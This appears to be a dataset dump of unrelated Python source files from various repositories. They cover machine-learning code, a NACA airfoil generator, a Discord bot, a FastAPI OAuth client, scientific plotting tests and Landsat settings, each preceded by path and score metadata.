targets *= (1 - inputs.label_smoothing)
targets += inputs.label_smoothing / n_classes
self.loss = model_helpers.masked_ce_loss(
self.logits, targets, inputs.mask, roll_direction=roll_direction)
primary = PredictionModule('primary',
([encoder.uni_reprs, encoder.bi_reprs]))
ps = [
PredictionModule('full', ([encoder.uni_reprs, encoder.bi_reprs]),
activate=False),
PredictionModule('forwards', [encoder.uni_fw]),
PredictionModule('backwards', [encoder.uni_bw]),
PredictionModule('future', [encoder.uni_fw], roll_direction=1),
PredictionModule('past', [encoder.uni_bw], roll_direction=-1),
]
self.unsupervised_loss = sum(p.loss for p in ps)
self.supervised_loss = primary.loss
self.probs = tf.nn.softmax(primary.logits)
self.preds = tf.argmax(primary.logits, axis=-1)
def update_feed_dict(self, feed, mb):
if self.task_name in mb.teacher_predictions:
feed[self.labels] = mb.teacher_predictions[self.task_name]
elif mb.task_name != 'unlabeled':
labels = minibatching.build_array(
[[0] + e.labels + [0] for e in mb.examples])
feed[self.labels] = np.eye(self.n_classes)[labels]
| 1.984375 | 2 |
plant/run.py | zhijiahu/gopigo-car | 2 | 12761612 | <reponame>zhijiahu/gopigo-car<filename>plant/run.py
import time
from datetime import datetime
import grovepi
import yaml
from elasticsearch import Elasticsearch
import MoistureDetector
def main():
with open('config.yaml', 'r') as config_file:
config = yaml.load(config_file)
es = Elasticsearch([config['es']['url']])
es_alias_name = 'moisture-index'
detector = MoistureDetector(port=0)
interval = 5 * 60
led = 5
grovepi.pinMode(led,"OUTPUT")
grovepi.ledBar_init(led, 0)
while True:
try:
moisture, condition = detector.read_moisture_value()
doc = {
'moisture' : moisture,
'condition': condition,
'timestamp': datetime.utcnow()
}
es_index_name = "{}-{}".format(es_alias_name, datetime.now().strftime("%Y%m"))
if not es.indices.exists(es_index_name):
es.indices.create(index=es_index_name)
res = es.index(index=es_index_name, body=doc)
print(res)
led_brightness = int(min(moisture / 300 * 10, 10)) + 1
grovepi.ledBar_setLevel(led, led_brightness)
# Alert @ 7am
now = datetime.utcnow()
if now.hour == 23 and condition == "DRY":
pass
time.sleep(interval)
except KeyboardInterrupt:
break
if __name__ == "__main__":
try:
main()
except IOError:
print(str(error))
exit(1)
exit(0)
| 2.640625 | 3 |
envs/dangerous_path_env.py | Miffyli/policy-supervectors | 17 | 12761613 | # A simple MDP where agent has to traverse a specific path
# in gridworld - wrong action will throw player back to start or do nothing.
# Player is rewarded for reaching new maximum length in the episode.
#
# State is represented by a positive ndim vector that tells
# where the player is. This is designed to mimic coordinate-systems
# and also deliberately confuse networks (e.g. might think higher value
# on axis 0 means we should take one specific action always)
#
import random
import numpy as np
import gym
# Fix for older gym versions
import gym.spaces
def generate_path(game_length: int, ndim: int, num_mines: int, seed: int = 42) -> np.ndarray:
"""Generate the path player has to follow.
Args:
game_length: Length of the path to generate
ndim: Number of dimensions in the environment
num_mines: Number of mines per step
seed: Seed used to generate path
Returns:
path: List of ints, representing actions player should take in each state.
mines: List of List of ints, representing which actions are mines in each state.
"""
path = []
mines = []
gen = np.random.default_rng(seed)
for i in range(game_length):
action_ordering = gen.permutation(ndim)
# First item goes to path, next num_mines go to mines
path.append(action_ordering[0].item())
mines.append(action_ordering[1:1 + num_mines].tolist())
return path, mines
class DangerousPathEnv(gym.Env):
"""
A N-dimensional environment where player has to choose
the exact correct action at any given location (follow
a very specific path). Otherwise game terminates or player stays
still, depending on if they hit a mine or not.
If `discrete_obs` is True, observation space tells location
of player in path. If False, uses continuous observations
that tell coordinate-like information of location of the player.
`mine_ratio` specifies the amount of mines (terminal states) versus
no-move moves per state.
"""
def __init__(
self,
game_length=100,
ndim=2,
seed=42,
discrete_obs=False,
random_action_p=0.0,
mine_ratio=1.0
):
super().__init__()
self.game_length = game_length
self.ndim = ndim
self.mine_ratio = mine_ratio
self.num_mines_per_step = np.floor(ndim * mine_ratio)
self.path, self.mines = generate_path(game_length, ndim, seed)
# Emperically found to be a necessary adjustment
self.step_size = 1.0
self.discrete_obs = discrete_obs
self.random_action_p = random_action_p
if discrete_obs:
self.observation_space = gym.spaces.Discrete(n=self.game_length)
else:
self.observation_space = gym.spaces.Box(0, 1, shape=(self.ndim,))
self.action_space = gym.spaces.Discrete(n=self.ndim)
self.path_location = 0
self.max_path_location = 0
self.num_steps = 0
self.player_location = np.zeros((self.ndim,))
def step(self, action):
if self.random_action_p > 0.0 and random.random() < self.random_action_p:
action = self.action_space.sample()
done = False
reward = 0
action = int(action)
if action == self.path[self.path_location]:
# You chose wisely
self.path_location += 1
# Only reward progressing once
if self.path_location > self.max_path_location:
reward = 1
self.max_path_location += 1
# Small step sizes
self.player_location[action] += self.step_size
if self.path_location == (self.game_length - 1):
done = True
else:
# You chose poorly
reward = 0
if action in self.mines[self.path_location]:
# You chose very poorly, back to start
self.path_location = 0
self.player_location = np.zeros((self.ndim,))
self.num_steps += 1
if self.num_steps >= self.game_length:
done = True
return self.path_location if self.discrete_obs else self.player_location, reward, done, {}
def reset(self):
self.path_location = 0
self.max_path_location = 0
self.num_steps = 0
self.player_location = np.zeros((self.ndim,))
return self.path_location if self.discrete_obs else self.player_location
def seed(self, seed):
self.path, self.mines = generate_path(self.game_length, self.ndim, seed)
| 3.59375 | 4 |
tests/__init__.py | Merkll/PPM | 0 | 12761614 | from tests import setUpTest
| 0.984375 | 1 |
linear_regression.py | abhishekbhakat/pyML | 0 | 12761615 | <gh_stars>0
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import TensorDataset
from torch.utils.data import DataLoader
import torch.nn.functional as F
# Input (temp, rainfall, humidity)
inputs = np.array([[73, 67, 43], [91, 88, 64], [87, 134, 58],
[102, 43, 37], [69, 96, 70], [73, 67, 43],
[91, 88, 64], [87, 134, 58], [102, 43, 37],
[69, 96, 70], [73, 67, 43], [91, 88, 64],
[87, 134, 58], [102, 43, 37], [69, 96, 70]],
dtype='float32')
# Targets (apples, oranges)
targets = np.array([[56, 70], [81, 101], [119, 133],
[22, 37], [103, 119], [56, 70],
[81, 101], [119, 133], [22, 37],
[103, 119], [56, 70], [81, 101],
[119, 133], [22, 37], [103, 119]],
dtype='float32')
inputs = torch.from_numpy(inputs)
targets = torch.from_numpy(targets)
# Define dataset
train_ds = TensorDataset(inputs, targets)
train_ds[0:3]
# Define data loader
batch_size = 5
train_dl = DataLoader(train_ds, batch_size, shuffle=True)
# Define model
model = nn.Linear(3, 2)
# print(model.weight)
# print(model.bias)
# list(model.parameters())
preds = model(inputs)
loss_fn = F.mse_loss
loss = loss_fn(model(inputs), targets)
print(loss)
opt = torch.optim.SGD(model.parameters(), lr=1e-5)
def fit(num_epochs, model, loss_fn, opt, train_dl):
# Repeat for given number of epochs
for epoch in range(num_epochs):
# Train with batches of data
for xb,yb in train_dl:
# 1. Generate predictions
pred = model(xb)
# 2. Calculate loss
loss = loss_fn(pred, yb)
# 3. Compute gradients
loss.backward()
# 4. Update parameters using gradients
opt.step()
# 5. Reset the gradients to zero
opt.zero_grad()
# Print the progress
if (epoch+1) % 10 == 0:
print('Epoch [{}/{}], Loss: {:.4f}'.format(epoch+1, num_epochs, loss.item()))
fit(100, model, loss_fn, opt, train_dl) | 2.3125 | 2 |
pycdt/utils/tests/test_plotter.py | hitarth64/pycdt | 0 | 12761616 | # coding: utf-8
from __future__ import division
__author__ = "<NAME>"
__copyright__ = "Copyright 2017, The Materials Project"
__version__ = "1.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
__date__ = "July 19, 2017"
import os
from pymatgen.core import Element
from pymatgen.core.structure import PeriodicSite, Structure, Lattice
# from pymatgen.entries.computed_entries import ComputedStructureEntry
from pymatgen.util.testing import PymatgenTest
from pymatgen.analysis.defects.core import Vacancy, DefectEntry
from pymatgen.analysis.defects.thermodynamics import DefectPhaseDiagram
from pycdt.utils.plotter import DefectPlotter
# from pycdt.core.defects_analyzer import ComputedDefect, DefectsAnalyzer
class DefectPlotterTest(PymatgenTest):
def setUp(self):
l = Lattice([[3.52,0.0,2.033], [1.174,3.32,2.033], \
[0.0,0.0,4.066]])
s_bulk = Structure(l, ['Ga', 'As'], \
[[0.0000, 0.0000, 0.0000], \
[0.2500, 0.2500, 0.2500]])
defect_site = PeriodicSite( 'As', [0.25, 0.25, 0.25], l)
defect = Vacancy( s_bulk, defect_site, charge = 1.)
defect_entry = DefectEntry( defect, 0.)
entries = [defect_entry]
vbm = 0.2
band_gap = 1.
dpd = DefectPhaseDiagram( entries, vbm, band_gap)
self.dp = DefectPlotter(dpd)
def test_get_plot_form_energy(self):
mu_elts = {Element('As'): 0, Element('Ga'): 0}
self.dp.get_plot_form_energy(mu_elts).savefig('test.pdf')
self.assertTrue(os.path.exists('test.pdf'))
os.system('rm test.pdf')
# def test_plot_conc_temp(self):
# self.dp.plot_conc_temp().savefig('test.pdf')
# self.assertTrue(os.path.exists('test.pdf'))
# os.system('rm test.pdf')
#
# def test_plot_carriers_ef(self):
# self.dp.plot_carriers_ef().savefig('test.pdf')
# self.assertTrue(os.path.exists('test.pdf'))
# os.system('rm test.pdf')
# def tearDown(self):
# self.da
import unittest
if __name__ == '__main__':
unittest.main()
| 1.914063 | 2 |
main.py | AntonStrickland/Goldbar-Discussion-Bot | 0 | 12761617 | import globals
from discussion_question_manager import DiscussionQuestionManager
import pickle
import discord
from discord.channel import TextChannel
from discord.message import Message
from discord.ext import tasks
from discord import RawReactionActionEvent as RawReaction
import logging
import os
import asyncio
logger: logging.Logger
class Client(discord.Client):
# TODO
# have people DM the bot, then the bot DMs me, and I react to the question in the DM with the bot
# which i guess I should have a way to toggle off "who asked the question" if they want to be anonymous
manager: DiscussionQuestionManager = DiscussionQuestionManager()
async def on_ready(self):
print("READY!!")
await self.start_message_loop()
# people react to message to add/remove themself from the list of people to be notified
# if they are already added, they are removed. else they are added.
async def change_notifiee(self, reaction: RawReaction):
# if we're in test mode
if globals.TEST_MODE:
# check if the msg is the same as the designated test one
if reaction.message_id != globals.TEST_REACTION_MSG_ID:
return
# otherwise
else:
# heck if it's the same as the designated real one
if reaction.message_id != globals.ACTUAL_REACTION_MSG_ID:
return
if reaction.user_id != globals.KINJO_ID: # don't care if kinjo's reacting, he will always be notified
self.manager.change_notifiee(reaction.user_id)
async def add_question(self, reaction: RawReaction):
# if we're testing, allow me and kinjo
if globals.TEST_MODE:
if reaction.member.id not in globals.ALLOWED_IDS:
return
# if we're live, only allow kinjo
else:
if reaction.member.id != globals.KINJO_ID:
return
channel: TextChannel = await self.fetch_channel(reaction.channel_id)
msg: Message = await channel.fetch_message(reaction.message_id)
# add new question to manager
self.manager.add_question_from_msg(msg)
async def on_raw_reaction_add(self, reaction: RawReaction):
if reaction.event_type != "REACTION_ADD":
return
if reaction.emoji.name == "kaneko_ok":
await self.change_notifiee(reaction)
if reaction.emoji.name == "✅":
await self.add_question(reaction)
# save updated manager to file
with open("manager.txt", "wb") as f:
pickle.dump(self.manager, f)
async def on_raw_reaction_remove(self, reaction: RawReaction):
if reaction.event_type != "REACTION_REMOVE":
return
if reaction.emoji.name == "kaneko_ok":
await self.change_notifiee(reaction)
# save updated manager to file
with open("manager.txt", "wb") as f:
pickle.dump(self.manager, f)
async def start_message_loop(self):
while True:
if globals.TEST_MODE:
await asyncio.sleep(globals.TEST_MESSAGE_DELAY_S)
else:
await asyncio.sleep(globals.ACTUAL_MESSAGE_DELAY_S)
msg = str(self.manager)
if globals.TEST_MODE:
channel = await self.fetch_channel(globals.TEST_CHANNEL)
else:
channel = await self.fetch_channel(globals.ACTUAL_CHANNEL)
await channel.send(msg)
with open("manager.txt", "wb") as f:
pickle.dump(self.manager, f)
def main():
# set up logging
logger = logging.getLogger('discord')
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
# set up environment tokens
try:
token = os.environ["GOLDBAR_BOT_TOKEN"]
except KeyError as e:
print(f"Token {e} not found. Please set your environment variable properly. See README. Exiting.")
exit()
intents = discord.Intents.default() # choose intents
client = Client(intents=intents) # make bot object
with open("manager.txt", "rb") as f: # load existing question manager, if any
try:
client.manager = pickle.load(f)
except EOFError:
pass
# start bot
client.run(token)
if __name__ == "__main__":
main() | 2.53125 | 3 |
c19_code/plot.py | datajms/COVID19_attribution | 0 | 12761618 | ## Some utils for plots
clean_variable_names = {
"age": "Age",
"anosmia": "Anosmia",
"cough": "Cough",
"diarrhea": "Diarrhea",
"fever": "Fever",
"minor_severity_factor": "Number of minor severity factors",
"risk_factor": "Number of risk factors",
"sore_throat_aches": "Sore throat/aches",
}
legend_imp_name = {
"SOBOL_TOTAL": "Sobol Total-order",
"SHAPLEY_EFFECT": "Shapley Effects",
"SHAP_IMPORTANCE": "Shap Importance",
"AVERAGE_IMPORTANCE": "Average Importance",
}
color_imp_name = {
"SOBOL_TOTAL": "rgb(192,233,231)",
"SHAPLEY_EFFECT": "rgb(252,236,147)",
"SHAP_IMPORTANCE": "rgb(227,142,139)",
"AVERAGE_IMPORTANCE": "rgb(56,108,176)",
}
x_axis_setting_tick = dict(
title="Normalized importances (%)",
titlefont_size=12,
tickfont_size=10,
range=[0, 30],
tick0=0,
dtick=5,
showgrid=True,
gridwidth=1,
gridcolor="rgb(230,230,230)",
showline=True,
linecolor="black",
mirror=True,
)
x_axis_setting = dict(
tickfont_size=10,
range=[0, 30],
tick0=0,
dtick=5,
showgrid=True,
gridwidth=1,
gridcolor="rgb(230,230,230)",
showline=True,
linecolor="black",
mirror=True,
)
y_axis_setting = dict(tickfont_size=10, showline=True, linecolor="black", mirror=True)
| 1.890625 | 2 |
grid_generator/naca_4digit_test.py | Mayu14/2D_comp_viscos | 1 | 12761619 | # coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
class Naca_4_digit(object):
def __init__(self, int_4, attack_angle_deg, resolution, quasi_equidistant=True, length_adjust=False, from5digit=False):
if from5digit == False:
self.m = float(int_4[0]) / 100 # maximum camber
self.p = float(int_4[1]) / 10 # position of the maximum camber
self.t = float(int_4[2:4]) / 100 # maximum thickness
self.load_setting(attack_angle_deg, resolution, quasi_equidistant, length_adjust)
self.__y_c()
self.__dyc_dx()
self.__y_t()
self.theta = np.arctan(self.dyc_dx)
self.get_surface()
if quasi_equidistant == True:
self.get_quasi_equidistant_line()
def load_setting(self, attack_angle_deg, resolution, quasi_equidistant=True, length_adjust=False):
self.use_quasi_equidistant = quasi_equidistant
self.reshape = length_adjust
if quasi_equidistant == True:
self.resolution = 100 * resolution
else:
self.resolution = resolution
self.new_resolution = resolution
self.attack_angle = attack_angle_deg
self.x = np.linspace(start = 0, stop = 1, num = self.resolution)
def __y_c(self):
x_lt_p = lambda m, p, x: m / (p ** 2) * (2.0 * p * x - x ** 2)
x_ge_p = lambda m, p, x: m / ((1 - p) ** 2) * ((1.0 - 2.0 * p) + 2.0 * p * x - x ** 2)
m = self.m
p = self.p
x = self.x
if ((p != 0) and (p != 1)):
self.y_c = np.where(x < p, x_lt_p(m, p, x), x_ge_p(m, p, x))
elif (p == 0):
self.y_c = m * (1.0 - x**2)
elif (p == 1):
self.y_c = m * (2.0 * x - x ** 2)
def __y_t(self):
t = self.t
x = self.x
self.y_t = t / 0.2 * (0.2969 * np.sqrt(x) - 0.1260 * x - 0.3516 * x**2 + 0.2843 * x**3 - 0.1015 * x**4)
def __dyc_dx(self):
x_lt_p = lambda m, p, x: 2.0 * m / (p ** 2) * (p - x)
x_ge_p = lambda m, p, x: 2.0 * m / ((1.0 - p) ** 2) * (p - x)
m = self.m
p = self.p
x = self.x
if ((p != 0) and (p != 1)):
self.dyc_dx = np.where(x < p, x_lt_p(m, p, x), x_ge_p(m, p, x))
elif (p == 0):
self.dyc_dx = - 2.0 * m * x
elif (p == 1):
self.dyc_dx = 2.0 * m * (1.0 - x)
def get_surface(self):
# original NACA-4digit wings
# upper
vec_l = np.full((3, self.resolution), 1.0)
vec_u = np.full((3, self.resolution), 1.0)
vec_u[0] = self.x - self.y_t * np.sin(self.theta) - 0.5
vec_u[1] = self.y_c + self.y_t * np.cos(self.theta)
# lower
vec_l[0] = self.x + self.y_t * np.sin(self.theta) - 0.5
vec_l[1] = self.y_c - self.y_t * np.cos(self.theta)
attack_angle = self.attack_angle / 180 * (np.pi)
rotMat = np.array([[np.cos(attack_angle), np.sin(attack_angle), 0], [- np.sin(attack_angle), np.cos(attack_angle), 0], [0, 0, 1]])
rot_l = rotMat.dot(vec_l)
rot_u = rotMat.dot(vec_u)
if self.reshape == True:
x_min = min(np.min(rot_l[0]), np.min(rot_u[0]))
x_max = max(np.max(rot_l[0]), np.max(rot_u[0]))
rate = 1.0 / (x_max - x_min)
if rate != 1.0:
expMat = np.array([[rate, 0, 0], [0, rate, 0], [0, 0, 1]])
rot_l = expMat.dot(rot_l)
rot_u = expMat.dot(rot_u)
self.x_l = rot_l[0] + 0.5
self.y_l = rot_l[1] + 0.5
self.x_u = rot_u[0] + 0.5
self.y_u = rot_u[1] + 0.5
def plot(self):
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.plot(self.x_u, self.y_u)
plt.plot(self.x_l, self.y_l)
plt.show()
def get_quasi_equidistant_line(self):
new_resolution = self.new_resolution
x_min = min(np.min(self.x_u), np.min(self.x_l))
x_max = max(np.max(self.x_u), np.max(self.x_l))
if self.reshape == False:
self.equidistant_x = np.linspace(start = 0, stop = 1, num = new_resolution)
else:
self.equidistant_x = np.linspace(start=x_min, stop=x_max, num=new_resolution)
self.equidistant_y_l = np.zeros(new_resolution)
self.equidistant_y_u = np.zeros(new_resolution)
for index in range(new_resolution):
if ((x_min <= self.equidistant_x[index]) and (x_max >= self.equidistant_x[index])):
self.equidistant_y_l[index] = self.y_l[np.argmin(np.abs(self.x_l - self.equidistant_x[index]))]
self.equidistant_y_u[index] = self.y_u[np.argmin(np.abs(self.x_u - self.equidistant_x[index]))]
else:
self.equidistant_y_l[index] = -1.0 # 外れ値
self.equidistant_y_u[index] = -1.0
def plot_quasi_equidistant_shape(self):
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.plot(self.equidistant_x, self.equidistant_y_u, "o")
plt.plot(self.equidistant_x, self.equidistant_y_l, "o")
plt.show()
def transform2complex(self):
z_u_reverse = (self.x_u + 1j * self.y_u)[::-1]
z_l = self.x_l + 1j * self.y_l
if self.use_quasi_equidistant == True:
return np.concatenate([z_u_reverse[::100], z_l[::100], z_u_reverse[0].reshape(-1)])
else:
if z_u_reverse[self.resolution - 1] == z_l[0]:
return np.concatenate([z_u_reverse, z_l[1:], z_u_reverse[0].reshape(-1)])
else:
return np.concatenate([z_u_reverse, z_l, z_u_reverse[0].reshape(-1)])
class Naca_5_digit(Naca_4_digit):
def __init__(self, int_5, attack_angle_deg, resolution, quasi_equidistant = True, length_adjust = False, from5digit = True):
self.cl = float(int_5[0])*(3.0/2.0) / 10 # designed lift_coefficient
self.p = float(int_5[1]) / 2.0 / 100 # position of the maximum camber
self.ref = int_5[2] # enable / disable reflect
self.t = float(int_5[3:5]) / 100.0 # maximum thickness
self.camberline_plofile = int(int_5[0:3])
self.camberline_plofile_table()
self.load_setting(attack_angle_deg, resolution, quasi_equidistant, length_adjust)
self.__y_c()
self.__dyc_dx()
super(Naca_5_digit, self).__init__(int_5, attack_angle_deg, resolution, quasi_equidistant = quasi_equidistant, length_adjust = length_adjust, from5digit = True)
def __y_c(self):
x_lt_m_nr = lambda m, k1, x: k1 / 6.0 * (x ** 3 - 3.0 * m * x ** 2 + m ** 2 * (3.0 - m) * x)
x_gt_m_nr = lambda m, k1, x: k1 / 6.0 * m ** 3 * (1.0 - x)
x_lt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * ((x - m)**3 - k2_k1 * (1.0-m)**3 * x - m**3 * x + m**3)
x_gt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * (k2_k1 * (x - m)**3 - k2_k1 * (1.0 - m)**3 * x - m**3 * x + m**3)
m = self.m
k1 = self.k1
x = self.x
if int(self.ref) == 0: # not reflected
self.y_c = np.where(x < m, x_lt_m_nr(m, k1, x), x_gt_m_nr(m, k1, x))
else:
k2_k1 = self.k2byk1
self.y_c = np.where(x < m, x_lt_m_rf(m, k1, k2_k1, x), x_gt_m_rf(m, k1, k2_k1, x))
def __dyc_dx(self):
x_lt_m_nr = lambda m, k1, x: k1 / 6.0 * (3.0 * x ** 2 - 6.0 * m * x + m ** 2 * (3.0 - m))
x_gt_m_nr = lambda m, k1, x: - k1 / 6.0 * m ** 3
x_lt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * (3.0 * (x - m) ** 2 - k2_k1 * (1.0 - m) ** 3 - m ** 3)
x_gt_m_rf = lambda m, k1, k2_k1, x: k1 / 6.0 * (3.0 * k2_k1 * (x - m) ** 2 - k2_k1 * (1.0 - m) ** 3 - m ** 3)
m = self.m
k1 = self.k1
x = self.x
if int(self.ref) == 0: # not reflected
self.dyc_dx = np.where(x < m, x_lt_m_nr(m, k1, x), x_gt_m_nr(m, k1, x))
else:
k2_k1 = self.k2byk1
self.dyc_dx = np.where(x < m, x_lt_m_rf(m, k1, k2_k1, x), x_gt_m_rf(m, k1, k2_k1, x))
def camberline_plofile_table(self):
if self.camberline_plofile == 210:
self.m = 0.058
self.k1 = 361.4
elif self.camberline_plofile == 220:
self.m = 0.126
self.k1 = 51.64
elif self.camberline_plofile == 230:
self.m = 0.2025
self.k1 = 15.957
elif self.camberline_plofile == 240:
self.m = 0.29
self.k1 = 6.643
elif self.camberline_plofile == 250:
self.m = 0.391
self.k1 = 3.230
elif self.camberline_plofile == 221:
self.m = 0.130
self.k1 = 51.990
self.k2byk1 = 0.000764
elif self.camberline_plofile == 231:
self.m = 0.217
self.k1 = 15.793
self.k2byk1 = 0.00677
elif self.camberline_plofile == 241:
self.m = 0.318
self.k1 = 6.520
self.k2byk1 = 0.0303
elif self.camberline_plofile == 251:
self.m = 0.441
self.k1 = 3.191
self.k2byk1 = 0.1355
else:
print("this type wing is not defined")
exit()
def main():
deg = 0.0
naca = Naca_4_digit(int_4="0012", attack_angle_deg=deg, resolution=100, quasi_equidistant=True, length_adjust=True)
naca.plot()
naca.plot_quasi_equidistant_shape()
naca = Naca_5_digit(int_5="23012", attack_angle_deg=deg, resolution=100, quasi_equidistant=True, length_adjust=True)
naca.plot()
naca.plot_quasi_equidistant_shape()
if __name__ == '__main__':
main()
| 2.375 | 2 |
handlers/base_handler.py | Krishna10798/Multi-User-Blog | 5 | 12761620 | import webapp2
import os
import jinja2
from utility import check_secure_val, filterKey, showCount
from models import User
template_dir = os.path.join(os.path.dirname(__file__), '../views')
jinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir),
autoescape=True)
jinja_env.filters['filterKey'] = filterKey
jinja_env.filters['showCount'] = showCount
def render_str(template, **params):
t = jinja_env.get_template(template)
return t.render(params)
class BlogHandler(webapp2.RequestHandler):
def write(self, *a, **kw):
self.response.out.write(*a, **kw)
def render_str(self, template, **params):
return render_str(template, **params)
def render(self, template, **kw):
self.write(self.render_str(template, **kw))
def get_user_from_cookie(self):
random = self.check_for_valid_cookie()
if random:
return User.get_by_id(int(random))
else:
return None
def check_for_valid_cookie(self):
random = self.request.cookies.get('random')
if random:
is_valid_cookie = check_secure_val(random)
if is_valid_cookie:
return self.request.cookies.get('random').split("|")[0]
return None
| 2.328125 | 2 |
scripts/field/go50000.py | Snewmy/swordie | 2 | 12761621 | <gh_stars>1-10
# Inside Dangerous Forest
sm.showEffect("Map/Effect.img/maplemap/enter/50000") | 0.753906 | 1 |
fastapi_discord/client.py | HKGx/fastapi-discord | 28 | 12761622 | <filename>fastapi_discord/client.py
from typing import Dict, List, Optional, Tuple, Union
import aiohttp
from aiocache import cached
from fastapi import Depends, Request
from fastapi.security import HTTPAuthorizationCredentials, HTTPBearer
from typing_extensions import TypedDict, Literal
from .config import DISCORD_API_URL, DISCORD_OAUTH_AUTHENTICATION_URL, DISCORD_TOKEN_URL
from .exceptions import RateLimited, ScopeMissing, Unauthorized, InvalidToken
from .models import Guild, GuildPreview, User
class RefreshTokenPayload(TypedDict):
client_id: str
client_secret: str
grant_type: Literal["refresh_token"]
refresh_token: str
class TokenGrantPayload(TypedDict):
client_id: str
client_secret: str
grant_type: Literal["authorization_code"]
code: str
redirect_uri: str
class TokenResponse(TypedDict):
access_token: str
token_type: str
expires_in: int
refresh_token: str
scope: str
PAYLOAD = Union[TokenGrantPayload, RefreshTokenPayload]
def _tokens(resp: TokenResponse) -> Tuple[str, str]:
"""
Extracts tokens from TokenResponse
Parameters
----------
resp: TokenResponse
Response
Returns
-------
Tuple[str, str]
An union of access_token and refresh_token
Raises
------
InvalidToken
If tokens are `None`
"""
access_token, refresh_token = resp.get("access_token"), resp.get("refresh_token")
if access_token is None or refresh_token is None:
raise InvalidToken("Tokens can't be None")
return access_token, refresh_token
class DiscordOAuthClient:
"""Client for Discord Oauth2.
Parameters
----------
client_id:
Discord application client ID.
client_secret:
Discord application client secret.
redirect_uri:
Discord application redirect URI.
"""
def __init__(self, client_id, client_secret, redirect_uri, scopes=("identify",)):
self.client_id = client_id
self.client_secret = client_secret
self.redirect_uri = redirect_uri
self.scopes = "%20".join(scope for scope in scopes)
self.client_session: aiohttp.ClientSession = aiohttp.ClientSession()
def get_oauth_login_url(self, state: Optional[str] = None):
"""
Returns a Discord Login URL
"""
client_id = f"client_id={self.client_id}"
redirect_uri = f"redirect_uri={self.redirect_uri}"
scopes = f"scope={self.scopes}"
response_type = "response_type=code"
state = f"&state={state}" if state else ""
return f"{DISCORD_OAUTH_AUTHENTICATION_URL}?{client_id}&{redirect_uri}&{scopes}&{response_type}{state}"
oauth_login_url = property(get_oauth_login_url)
@cached(ttl=550)
async def request(self, route: str, token: str = None, method: Literal["GET", "POST"] = "GET"):
headers: Dict = {}
if token:
headers = {"Authorization": f"Bearer {token}"}
if method == "GET":
async with self.client_session.get(f"{DISCORD_API_URL}{route}", headers=headers) as resp:
data = await resp.json()
elif method == "POST":
async with self.client_session.post(f"{DISCORD_API_URL}{route}", headers=headers) as resp:
data = await resp.json()
else:
raise Exception("Other HTTP than GET and POST are currently not Supported")
if resp.status == 401:
raise Unauthorized
if resp.status == 429:
raise RateLimited(data, resp.headers)
return data
async def get_token_response(self, payload: PAYLOAD) -> TokenResponse:
async with self.client_session.post(DISCORD_TOKEN_URL, data=payload) as resp:
return await resp.json()
async def get_access_token(self, code: str) -> Tuple[str, str]:
payload: TokenGrantPayload = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"grant_type": "authorization_code",
"code": code,
"redirect_uri": self.redirect_uri,
}
resp = await self.get_token_response(payload)
return _tokens(resp)
async def refresh_access_token(self, refresh_token: str) -> Tuple[str, str]:
payload: RefreshTokenPayload = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"grant_type": "refresh_token",
"refresh_token": refresh_token,
}
resp = await self.get_token_response(payload)
return _tokens(resp)
async def user(self, request: Request):
if "identify" not in self.scopes:
raise ScopeMissing("identify")
route = "/users/@me"
token = self.get_token(request)
return User(**(await self.request(route, token)))
async def guilds(self, request: Request) -> List[GuildPreview]:
if "guilds" not in self.scopes:
raise ScopeMissing("guilds")
route = "/users/@me/guilds"
token = self.get_token(request)
return [Guild(**guild) for guild in await self.request(route, token)]
def get_token(self, request: Request):
authorization_header = request.headers.get("Authorization")
if not authorization_header:
raise Unauthorized
authorization_header = authorization_header.split(" ")
if not authorization_header[0] == "Bearer" or len(authorization_header) > 2:
raise Unauthorized
token = authorization_header[1]
return token
async def isAuthenticated(self, token: str):
route = "/oauth2/@me"
try:
await self.request(route, token)
return True
except Unauthorized:
return False
async def requires_authorization(self, bearer: Optional[HTTPAuthorizationCredentials] = Depends(HTTPBearer())):
if bearer is None:
raise Unauthorized
if not await self.isAuthenticated(bearer.credentials):
raise Unauthorized
| 2.421875 | 2 |
tests/vcf_tools/test_parse_variant.py | Varstation/genmod | 46 | 12761623 | <filename>tests/vcf_tools/test_parse_variant.py
from genmod.vcf_tools import get_variant_id
class TestGetVariantId:
def test_get_variant_id(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'A',
'ALT': 'G'
}
assert get_variant_id(variant) == "1_10_A_G"
def test_get_variant_id_sv_ins(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'N',
'ALT': '<INS>'
}
assert get_variant_id(variant) == "1_10_N_INS"
def test_get_variant_id_sv_dup_tandem(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'N',
'ALT': '<DUP:TANDEM>'
}
assert get_variant_id(variant) == "1_10_N_DUPTANDEM"
def test_get_variant_id_sv_bdn(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'A',
'ALT': 'T[6:134717462['
}
assert get_variant_id(variant) == "1_10_A_T6134717462" | 2.25 | 2 |
app-tasks/rf/src/rf/uploads/landsat8/settings.py | radiantearth/raster-foundry | 0 | 12761624 | """Settings shared by functions for indexing Landsat 8 data"""
from rf.utils.io import s3
organization = 'dfac6307-b5ef-43f7-beda-b9f208bb7726'
# Band 8 is panchromatic and at 15m resolution. All other bands
# are at the 30m resolution. Bands are:
# 1: Coastal aerosol
# 2: Blue
# 3: Green
# 4: Red
# 5: Near infrared (NIR)
# 6: SWIR 1
# 7: SWIR 2
# 8: Panchromatic
# 9: Cirrus
# 10: Themral infrared (TIRS 1) (resampled to 30m from 100m in product)
# 11: Themral infrared (TIRS 2) (resampled to 30m from 100m in product)
#
# Source: http://landsat.usgs.gov/band_designations_landsat_satellites.php
band_lookup = {
'15m': [{
'name': 'panchromatic - 8',
'number': 0,
'wavelength': [500, 680]
}],
'30m': [{
'name': 'coastal aerosol - 1',
